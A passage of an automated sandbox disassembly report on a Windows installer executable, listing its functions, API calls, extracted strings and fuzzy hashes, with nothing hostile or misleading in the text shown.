                                                                          • Not Executed
                                                                          control_flow_graph 1913 451b74-451bc5 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 1914 451bc7-451bce 1913->1914 1915 451bd0-451bd2 1913->1915 1914->1915 1916 451bd4 1914->1916 1917 451bd6-451c0c call 42e1f0 call 42e670 call 403400 1915->1917 1916->1917
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451B94
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451B9A
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451BAE
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451BB4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                          • API String ID: 1646373207-2130885113
                                                                          • Opcode ID: f383fb48213f6c2b98df67bb585b7a3e2d1d6244cf436abb077e6f35d80479e6
                                                                          • Instruction ID: 997ed90857de5ca6b6faab55f770a1a30dabd985267bea0a56e7b9690acb7eff
                                                                          • Opcode Fuzzy Hash: f383fb48213f6c2b98df67bb585b7a3e2d1d6244cf436abb077e6f35d80479e6
                                                                          • Instruction Fuzzy Hash: 4201D474284304AEDB02EB72EC06F5B3A58F751B1AF60487BF800562A3D6FD5D09CA2D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00477688 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 108COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004777FB,?,?,00000000,00494628,00000000,00000000,?,00492351,00000000,004924FA,?,00000000), ref: 0047771B
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,004777FB,?,?,00000000,00494628,00000000,00000000,?,00492351,00000000,004924FA,?,00000000), ref: 00477724
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                                          • API String ID: 1375471231-1421604804
                                                                          • Opcode ID: 9af9e5047942150dd1bdaf748b612ec8dc7c41cda999b56e55422ae8274150d3
                                                                          • Instruction ID: 4b0667b2ca952db17e5eb31d7eb45e66b75ce74adbb243fdaac5edde39bfd4c6
                                                                          • Opcode Fuzzy Hash: 9af9e5047942150dd1bdaf748b612ec8dc7c41cda999b56e55422ae8274150d3
                                                                          • Instruction Fuzzy Hash: B3415634A002099BCB01FF95C891ADEB7B5FB44304F50857BE81477396D738AE05CBA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00430174 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • RegisterClipboardFormatA.USER32(commdlg_help), ref: 0043017C
                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043018B
                                                                          • GetCurrentThreadId.KERNEL32 ref: 004301A5
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 004301C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                          • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                          • API String ID: 4130936913-2943970505
                                                                          • Opcode ID: e1a288e5974f646cac8171a9bb8c2e0076bf1e8d900104ca3b2b9541d9e9a9a5
                                                                          • Instruction ID: 40284a23f2128dd4c732f76bf629692f59332b695a7ba269acd0c8d21ef7b0e1
                                                                          • Opcode Fuzzy Hash: e1a288e5974f646cac8171a9bb8c2e0076bf1e8d900104ca3b2b9541d9e9a9a5
                                                                          • Instruction Fuzzy Hash: ACF082B04483408AD700EB75C802B197BE4EB99318F00467FB858A63E1D77E8501CB5F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00453780 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 155COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,0045399C,0045399C,00000031,0045399C,00000000), ref: 00453928
                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,0045399C,0045399C,00000031,0045399C), ref: 00453935
                                                                            • Part of subcall function 004536EC: WaitForInputIdle.USER32(00000001,00000032), ref: 00453718
                                                                            • Part of subcall function 004536EC: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045373A
                                                                            • Part of subcall function 004536EC: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00453749
                                                                            • Part of subcall function 004536EC: CloseHandle.KERNEL32(00000001,00453776,0045376F,?,00000031,00000080,00000000,?,?,00453AC7,00000080,0000003C,00000000,00453ADD), ref: 00453769
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                          • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                          • API String ID: 854858120-615399546
                                                                          • Opcode ID: 3ba6da27587f0247c6075d637dc04b84a3427199ed6966589dcae68aca958c76
                                                                          • Instruction ID: 23b7935fd39ab9199875fd3ca17ea8a190fbf679708bf4b94726f8b76bbbb425
                                                                          • Opcode Fuzzy Hash: 3ba6da27587f0247c6075d637dc04b84a3427199ed6966589dcae68aca958c76
                                                                          • Instruction Fuzzy Hash: 385148B470034DABDB11EFA5CC41BDEBBB9AF44746F50443BB804A7282D7799B098B58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004235FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadIconA.USER32(00400000,MAINICON), ref: 0042368C
                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 004236B9
                                                                          • OemToCharA.USER32(?,?), ref: 004236CC
                                                                          • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 0042370C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Char$FileIconLoadLowerModuleName
                                                                          • String ID: 2$MAINICON
                                                                          • API String ID: 3935243913-3181700818
                                                                          • Opcode ID: 0aa366c20d2d5f249e9f5701ecd4d5d8333df010bd072e77a87ccb3058afe0f7
                                                                          • Instruction ID: 369b424dc89666f2ebc4032af242e6aa1f8f3c6487aa9724dd5eac47ff86fd2b
                                                                          • Opcode Fuzzy Hash: 0aa366c20d2d5f249e9f5701ecd4d5d8333df010bd072e77a87ccb3058afe0f7
                                                                          • Instruction Fuzzy Hash: EC31C4B0A042449ADF10EF29C8C57C67BE8AF14308F4440BAE844DB383D7BED989CB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418EA8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00418EAD
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418ECE
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00418EE9
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F0A
                                                                            • Part of subcall function 00423038: 73A1A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
                                                                            • Part of subcall function 00423038: EnumFontsA.GDI32(00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 004230A1
                                                                            • Part of subcall function 00423038: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230A9
                                                                            • Part of subcall function 00423038: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230B4
                                                                            • Part of subcall function 004235FC: LoadIconA.USER32(00400000,MAINICON), ref: 0042368C
                                                                            • Part of subcall function 004235FC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 004236B9
                                                                            • Part of subcall function 004235FC: OemToCharA.USER32(?,?), ref: 004236CC
                                                                            • Part of subcall function 004235FC: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 0042370C
                                                                            • Part of subcall function 0041F088: GetVersion.KERNEL32(?,00418F60,00000000,?,?,?,00000001), ref: 0041F096
                                                                            • Part of subcall function 0041F088: SetErrorMode.KERNEL32(00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0B2
                                                                            • Part of subcall function 0041F088: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
                                                                            • Part of subcall function 0041F088: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0CC
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F0FC
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F125
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F13A
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F14F
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F164
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F179
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F18E
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1A3
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1B8
                                                                            • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1CD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                          • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                          • API String ID: 3864787166-2767913252
                                                                          • Opcode ID: b3f6e413c8898143d790cb1a0652853cd6d9d94ba28684c67143a23da7476cd1
                                                                          • Instruction ID: 92c0f9287c22c5e7546306507112dd287fc16e7faa7ca2eb1c3947f0aa7fa29a
                                                                          • Opcode Fuzzy Hash: b3f6e413c8898143d790cb1a0652853cd6d9d94ba28684c67143a23da7476cd1
                                                                          • Instruction Fuzzy Hash: 511160B06142409AC700FF6AE84274A77E0EBA930DF40853FF548DB2A1DB3D9946CB5E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004135AC Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 004135D4
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004135DF
                                                                          • GetWindowLongA.USER32(?,000000F4), ref: 004135F1
                                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 00413604
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 0041361B
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 00413632
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$Prop
                                                                          • String ID:
                                                                          • API String ID: 3887896539-0
                                                                          • Opcode ID: ac9e2524259f19aa4ae75357c34db2059614287f421b72dcfc2803ed6b471743
                                                                          • Instruction ID: 8501a907ea9830ee22782c43eb3b10d12b3a7942569ffdc076e3785703ae90ad
                                                                          • Opcode Fuzzy Hash: ac9e2524259f19aa4ae75357c34db2059614287f421b72dcfc2803ed6b471743
                                                                          • Instruction Fuzzy Hash: 0911FC75200204BFCB00DF99DC84E9A3BE8AB09365F104266B928DB2A1D738EE908B54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0046DB54 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 263fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046DD25,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE), ref: 0046DD01
                                                                          • FindClose.KERNEL32(000000FF,0046DD2C,0046DD25,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE,?), ref: 0046DD1F
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046DE47,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE), ref: 0046DE23
                                                                          • FindClose.KERNEL32(000000FF,0046DE4E,0046DE47,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE,?), ref: 0046DE41
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID: UF
                                                                          • API String ID: 2066263336-3088804789
                                                                          • Opcode ID: f2465bc261f959717d47697a8d45f32f7a1ade22301a2265577b1f26eed1a576
                                                                          • Instruction ID: 7787c03929e80ffec34d714e2f8fb83db301553702bc5b4ecfdbbcdcf4a79d9f
                                                                          • Opcode Fuzzy Hash: f2465bc261f959717d47697a8d45f32f7a1ade22301a2265577b1f26eed1a576
                                                                          • Instruction Fuzzy Hash: C2B11B74E0424D9FCF11DFA5C881ADEBBB9BF4C304F5081AAE808A7251D7399A46CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00453E40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00453FD7,?,00000000,00454017), ref: 00453F1D
                                                                          Strings
                                                                          • PendingFileRenameOperations2, xrefs: 00453EEC
                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00453EA0
                                                                          • PendingFileRenameOperations, xrefs: 00453EBC
                                                                          • WININIT.INI, xrefs: 00453F4C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                          • API String ID: 47109696-2199428270
                                                                          • Opcode ID: 6a4b91970a201f8e62ec4ce35f438840b63ea26c0fa97f58e3d9b69a11e17943
                                                                          • Instruction ID: 2ff6c49e49fdc546bb7a45c023e4930071e44da3c5b1decde5d7ffad05d461ef
                                                                          • Opcode Fuzzy Hash: 6a4b91970a201f8e62ec4ce35f438840b63ea26c0fa97f58e3d9b69a11e17943
                                                                          • Instruction Fuzzy Hash: BF51C831E041089FDB10DF61DC52ADEF7B9EB84705F60817BF804A72C2DB78AA45CA18
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00463630 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004636CD
                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004636F3
                                                                            • Part of subcall function 00463570: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00463608
                                                                            • Part of subcall function 00463570: DestroyCursor.USER32(00000000), ref: 0046361E
                                                                          • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046374F
                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463775
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$ExtractFileInfo$CursorDestroyDraw
                                                                          • String ID: c:\directory
                                                                          • API String ID: 2926980410-3984940477
                                                                          • Opcode ID: 6691f682c62b404754f8d66222e799753b1ee5a40e648aa7774ae51fe24a4016
                                                                          • Instruction ID: bae189fc96b8bd3553fc63f17e14eeae1d3b5729288d1f1a5c0b2b9fb69e759c
                                                                          • Opcode Fuzzy Hash: 6691f682c62b404754f8d66222e799753b1ee5a40e648aa7774ae51fe24a4016
                                                                          • Instruction Fuzzy Hash: CB4171B4600244AFD711DF55DC8AFDEBBE8EB48705F1081B6F904D7391E678AE408A59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00453544 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 004535F2
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,004536B8), ref: 0045365C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressByteCharMultiProcWide
                                                                          • String ID: P@!n$SfcIsFileProtected$sfc.dll
                                                                          • API String ID: 2508298434-664636605
                                                                          • Opcode ID: f0ce954cf5e6c0f92a7d370075d7fcb6cf00d1472f275adf203a8e9d9dbee81d
                                                                          • Instruction ID: be851dfb18f8685af01f62dd8973d7430abba5c381566a94229306a2653f0790
                                                                          • Opcode Fuzzy Hash: f0ce954cf5e6c0f92a7d370075d7fcb6cf00d1472f275adf203a8e9d9dbee81d
                                                                          • Instruction Fuzzy Hash: 33419770A00318ABEB20DF55DC85B9D77B8AB54346F5040BBA808A7393D7789F49CE5C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042DC7C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042DC88
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DE0B,00000000,0042DE23,?,?,?,?,00000006,?,00000000,00491717), ref: 0042DCA3
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DCA9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressDeleteHandleModuleProc
                                                                          • String ID: RegDeleteKeyExA$advapi32.dll
                                                                          • API String ID: 588496660-1846899949
                                                                          • Opcode ID: 4c361a7a43e5834a8a8afc63cfbcc85a9ce817fb11b6eda3160fbad0bd781d86
                                                                          • Instruction ID: 9ef85b4990a5f4fb77651896212c2f73edba4f4f6701b5dd75972328515d435d
                                                                          • Opcode Fuzzy Hash: 4c361a7a43e5834a8a8afc63cfbcc85a9ce817fb11b6eda3160fbad0bd781d86
                                                                          • Instruction Fuzzy Hash: 07E06DF0B45230AAD62067ABBD4AFA327289BA5725F544037B105A619182FC4C41DE5C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0047D43C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetActiveWindow.USER32(?,?,00000000,0047D751,?,?,00000001,?), ref: 0047D54D
                                                                          • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 0047D5C2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveChangeNotifyWindow
                                                                          • String ID: $Need to restart Windows? %s
                                                                          • API String ID: 1160245247-4200181552
                                                                          • Opcode ID: d32a6059a512e9bf963a78dfa1268871c9947cd75c38b82ea2162a998853572e
                                                                          • Instruction ID: a8c1ceac0135a07eac7a41659c63538f6f32d9d948fb070117fc44b1a1a01c6f
                                                                          • Opcode Fuzzy Hash: d32a6059a512e9bf963a78dfa1268871c9947cd75c38b82ea2162a998853572e
                                                                          • Instruction Fuzzy Hash: 0E91A074A006449FCB01EF69E885B9E77F4AF49308F1080BBE4049B362D738A945CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0046B3C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                          • GetLastError.KERNEL32(00000000,0046B5BD,?,?,00000001,004950AC), ref: 0046B49A
                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046B514
                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046B539
                                                                          Strings
